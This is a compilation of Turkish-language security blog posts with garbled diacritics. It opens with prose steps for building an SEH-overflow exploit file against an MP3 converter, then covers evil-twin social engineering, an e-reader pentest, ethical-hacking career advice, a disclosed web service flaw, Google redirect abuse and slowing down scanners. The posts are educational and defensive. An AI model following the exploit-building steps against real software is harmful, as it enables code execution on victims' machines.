Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

